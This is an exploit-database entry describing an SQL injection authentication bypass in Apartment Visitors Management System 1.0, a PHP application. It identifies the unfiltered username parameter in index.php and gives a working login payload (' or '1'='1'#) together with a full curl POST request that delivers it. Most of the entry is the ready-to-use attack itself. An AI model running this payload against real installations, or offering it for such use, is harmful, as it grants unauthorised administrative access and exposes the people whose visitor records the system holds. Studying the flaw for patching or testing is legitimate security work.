id: 34681
date: 07/14/2020
title: Apartment Visitors Management System Project 1.0 SQL Injection Vulnerability
author: gh1mau
cves: 

# Exploit Title: Apartment Visitors Management System Project 1.0 - Authentication Bypass
# Exploit Author: gh1mau
# Team Members: Capt'N,muzzo,chaos689 | https://h0fclanmalaysia.wordpress.com/
# Vendor Homepage: https://phpgurukul.com/apartment-visitors-management-system-using-php-and-mysql/
# Software Link: https://phpgurukul.com/?smd_process_download=1&download_id=10395
# Version: V1.0
# Tested on: PHP 5.6.18, Apache/2.4.18 (Win32), Ver 14.14 Distrib 5.7.11, for Win32 (AMD64)


Vulnerable File:
---------------- 
/index.php


Vulnerable Code:
-----------------
line 8: $adminuser=$_POST['username'];

Vulnerable Issue:
-----------------
$adminuser=$_POST['username']; is not filtered correcty


POC:
----

URL: http://localhost/avms/index.php
Username : ' or '1'='1'#
Password : anything


Sample Request:

curl -i -s -k --location --request POST 'http://localhost:80/avms/index.php' \
--header 'Origin: http://localhost' \
--header 'Cookie: PHPSESSID=g0v05i144dnr9bud7j1mb6n167' \
--header 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' \
--header 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko/20100101 Firefox/78.0' \
--header 'Connection: close' \
--header 'Referer: http://localhost/avms/index.php' \
--header 'Host: localhost' \
--header 'Accept-Encoding: gzip, deflate' \
--header 'Upgrade-Insecure-Requests: 1' \
--header 'Accept-Language: en-US,en;q=0.5' \
--header 'Content-Length: 61' \
--header 'Content-Type: application/x-www-form-urlencoded' \
--data-raw 'username=%27+or+%271%27%3D%271%27%23&password=anything&login='

#  0day.today [2023-03-23]  #